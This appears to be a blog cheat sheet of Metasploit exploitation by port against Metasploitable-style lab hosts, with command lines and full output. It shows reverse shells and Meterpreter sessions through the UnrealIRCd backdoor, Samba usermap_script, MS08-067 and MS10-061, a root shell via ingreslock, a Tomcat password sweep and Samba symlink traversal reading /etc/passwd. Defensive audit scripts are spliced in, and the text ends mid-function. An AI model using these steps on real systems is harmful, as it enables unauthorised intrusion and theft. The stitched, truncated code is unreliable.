
Exploits - Port Number

Thursday, 16 October 2014
port 6667 - Unreal ircd (win/linux)
port 1524 - ingreslock (linux)
port 8180 - tomcat_mgr_login (win/linux)
port 139 - (linux)
port 139/445 - (linux)
port 445 - (linux)
port 135 - msrpc (win)
port 445 - microsoft-ds (win)
port 1433 - ms-sql-s (win)
port 5900 - vnc (win/linux)
port 5432 - postgresql (linux)
port 25 - smtp
port 3306 - mysql (linux)
port 21 - FTP (linux)

The exploits below were tested with BackTrack 5 R1.

----------------------------------------------------------------------------------

port 6667 - Unreal ircd (win/linux)

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.20:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

----------------------------------------------------------------------------------

port 1524 - ingreslock (linux)

1524/tcp open ingreslock?

The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@bt# telnet 192.168.1.20 1524
Trying 192.168.1.20...
Connected to 192.168.1.20.
Escape character is '^]'.
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)

----------------------------------------------------------------------------------

port 8180 - tomcat_mgr_login (win/linux)

msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8180
msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address
msf auxiliary(tomcat_mgr_login) > run

[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'

[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
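The sweep above succeeds only because the manager account still carries a stock password. The script below is an added example (not part of the original post) that audits a Tomcat tomcat-users.xml for exactly the username/password pairs the tomcat_mgr_login run tried; it parses the documented <tomcat-users>/<user> layout with the standard library and runs on a constructed sample file.

```python
"""Audit a Tomcat tomcat-users.xml for manager accounts that would fall to the
default-credential sweep shown above.

Added example, not code from the original post: it parses the documented
<tomcat-users>/<user> layout with the standard library and runs on a
constructed sample file embedded below."""
import xml.etree.ElementTree as ET

# Username/password pairs taken from the tomcat_mgr_login run above.
DEFAULT_PAIRS = {
    ("admin", ""), ("manager", ""), ("tomcat", ""), ("root", ""),
    ("admin", "admin"), ("manager", "manager"), ("role1", "role1"),
    ("root", "root"), ("tomcat", "tomcat"), ("both", "both"),
    ("admin", "manager"), ("admin", "tomcat"), ("admin", "s3cret"),
    ("manager", "s3cret"), ("role1", "tomcat"), ("both", "tomcat"),
}

# Roles that reach the manager/host-manager applications (Tomcat 7+ names
# plus the pre-7 "manager" role the Metasploitable host still uses).
PRIVILEGED_ROLES = {"manager", "manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed sample: three stock-looking accounts plus one hardened one.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="deploy" password="Q7m!pLz9#vTe2wXs" roles="manager-script"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples, in file order."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        # Newer Tomcat files carry an XML namespace; compare the local name.
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        # Tomcat accepts either "username" or the older "name" attribute.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",")}
        privileged = bool(roles & PRIVILEGED_ROLES)
        if (name, password) in DEFAULT_PAIRS:
            level = "high" if privileged else "medium"
            findings.append((name, f"{level}: default credential pair"))
        elif privileged and len(password) < 12:
            findings.append((name, "medium: short password on privileged role"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against $CATALINA_BASE/conf/tomcat-users.xml on each Tomcat host; any "high" finding means the manager application is one wordlist away from an attacker, and the fix is to remove or re-password the stock accounts and to restrict the manager application to trusted addresses.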

----------------------------------------------------------------------------------

port 139 - (linux)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk
IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server               Comment
---------            -------
METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)

Workgroup            Master
---------            -------
WORKGROUP            METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 139/445 - (linux)

samba "username map script" command execution

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set rhost Remote-IP-Address
msf exploit(usermap_script) > set lhost Local-IP-Address
msf exploit(usermap_script) > set rport 139      (445 also works)
msf exploit(usermap_script) > set payload cmd/unix/reverse

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AGo0tmuVPzZXPNPw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "AGo0tmuVPzZXPNPw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:51822) at 2012-10-05 14:35:10 +0100
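Both Samba sections above come down to smb.conf settings: a writeable share reachable anonymously, symlinks allowed to point outside the share (the symlink-traversal module links 'rootfs' to /), and a configured 'username map script'. The following is an added example, not code from the original post, that checks an smb.conf for those settings. The parser is a minimal ini-style reader rather than Samba's own, the sample config is constructed to resemble the Metasploitable share listing, and the script path in it is invented.

```python
"""Audit an smb.conf for the settings the two Samba sections above depend on.

Added example, not from the original post. Minimal ini-style parser, not
Samba's; the sample config is constructed and the script path is invented."""

TRUE_VALUES = {"yes", "true", "1"}

SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = metasploitable server
   security = user
   # unknown users are mapped to the guest account
   map to guest = bad user
   # invented path, stands in for whatever script was configured
   username map script = /etc/samba/scripts/mapusers.sh
   unix extensions = yes

[tmp]
   comment = oh noes!
   path = /tmp
   writable = yes
   guest ok = yes
   wide links = yes

[opt]
   path = /opt
   read only = yes
"""

# The same file with the three dangerous settings corrected.
HARDENED_SMB_CONF = (SAMPLE_SMB_CONF
    .replace("map to guest = bad user", "map to guest = never")
    .replace("username map script = /etc/samba/scripts/mapusers.sh", "")
    .replace("guest ok = yes", "guest ok = no")
    .replace("wide links = yes", "wide links = no"))


def parse_smb_conf(text):
    """Return {section: {key: value}} with keys and values lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples."""
    sections = parse_smb_conf(text)
    g = sections.get("global", {})

    def opt(share, key, default):
        # Per-share value, then the [global] value, then Samba's default.
        return share.get(key, g.get(key, default))

    findings = []
    if g.get("username map script"):
        findings.append(("global", "username map script is configured: "
                         + g["username map script"]))
    if g.get("map to guest", "never") != "never" or g.get("security") == "share":
        findings.append(("global", "failed or anonymous logins are mapped to guest"))
    for name, share in sections.items():
        if name == "global":
            continue
        # 'writable'/'writeable' are the inverse of 'read only' (default yes).
        w = opt(share, "writable", opt(share, "writeable", None))
        writable = w in TRUE_VALUES if w is not None else opt(share, "read only", "yes") == "no"
        guest = opt(share, "guest ok", opt(share, "public", "no")) in TRUE_VALUES
        # 'wide links' defaulted to yes in Samba 3.0.x; newer releases force it
        # off while 'unix extensions' is on, so only an explicit yes is flagged.
        wide = opt(share, "wide links", "no") in TRUE_VALUES
        unix_ext = g.get("unix extensions", "yes") in TRUE_VALUES
        follow = opt(share, "follow symlinks", "yes") in TRUE_VALUES
        if writable and guest:
            findings.append((name, "writeable share with guest access"))
        if writable and follow and wide and unix_ext:
            findings.append((name, "client-created symlinks can escape the share"))
    return findings


if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {finding}")
    print("hardened:", audit_smb_conf(HARDENED_SMB_CONF))
```

The hardened variant produces no findings: with 'wide links = no' a symlink created through unix extensions cannot leave the share, 'guest ok = no' removes the anonymous write path, and dropping 'username map script' removes the option the usermap_script module abuses. Upgrading Samba past 3.0.x is still the real fix, since the option values only matter while the vulnerable code is present.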

----------------------------------------------------------------------------------

port 445 - (linux)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

The steps are the same as for port 139 above: list the shares anonymously with smbclient -L, run auxiliary/admin/smb/samba_symlink_traversal against the writeable 'tmp' share, then browse \tmp\rootfs\ with smbclient to read files such as /etc/passwd.

----------------------------------------------------------------------------------

port 135 - msrpc (win)

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set lhost IP-Address
msf exploit(ms03_026_dcom) > set rhost IP-Address
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Sending exploit ...

----------------------------------------------------------------------------------

port 445 - microsoft-ds (win)

use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit

[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once the session is open, start a command shell by typing the following at the meterpreter > prompt:

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

myexploit.wordpress.com/control-smb-445-137-139/

And the print spooler exploit:

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
jduck
hdm

Available targets:
  Id  Name
  --  ----
  0   Windows Universal

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  spoolss          no        The named pipe for the spooler service

Payload information:
Space: 1024
Avoid: 0 characters

Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000

meterpreter >
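The module description explains the footprint MS10-061 leaves on disk: the print spooler writes an executable into %SystemRoot%\system32 and a .mof into Wbem\Mof, and WMI compiles the .mof on its own. That is a narrow pattern to watch for. The script below is an added example, not part of the original post: it classifies file-creation events in a Sysmon Event ID 11 (FileCreate)-like JSON shape with the fields Image and TargetFilename. The events are constructed, the file names are invented, and only the directories come from the module description.

```python
"""Flag file-creation events matching the MS10-061 pattern from the module
info above: spoolsv.exe writing into system32, in particular a .mof under
wbem\\mof, which WMI compiles automatically.

Added example, not from the original post. Events are constructed in a Sysmon
Event ID 11-like JSON shape; file names are invented."""
import json
import ntpath  # Windows path handling regardless of the host OS

SAMPLE_EVENTS = [
    r'{"EventID": 11, "UtcTime": "2012-10-05 14:35:09", "Image": "C:\\Windows\\System32\\spoolsv.exe", "TargetFilename": "C:\\Windows\\System32\\spool\\PRINTERS\\00004.SPL"}',
    r'{"EventID": 11, "UtcTime": "2012-10-05 14:35:10", "Image": "C:\\Windows\\System32\\spoolsv.exe", "TargetFilename": "C:\\Windows\\System32\\EXAMPLE-dropped.exe"}',
    r'{"EventID": 11, "UtcTime": "2012-10-05 14:35:10", "Image": "C:\\Windows\\System32\\spoolsv.exe", "TargetFilename": "C:\\Windows\\System32\\wbem\\mof\\EXAMPLE-dropped.mof"}',
    r'{"EventID": 1, "UtcTime": "2012-10-05 14:35:11", "Image": "C:\\Windows\\System32\\EXAMPLE-dropped.exe", "CommandLine": "EXAMPLE-dropped.exe"}',
    r'{"EventID": 11, "UtcTime": "2012-10-05 14:40:00", "Image": "C:\\Windows\\System32\\msiexec.exe", "TargetFilename": "C:\\Windows\\System32\\wbem\\mof\\vendor-provider.mof"}',
    r'{"EventID": 11, "UtcTime": "2012-10-05 14:41:00", "Image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "TargetFilename": "C:\\Windows\\System32\\wbem\\Logs\\wbemprox.log"}',
]


def classify(event):
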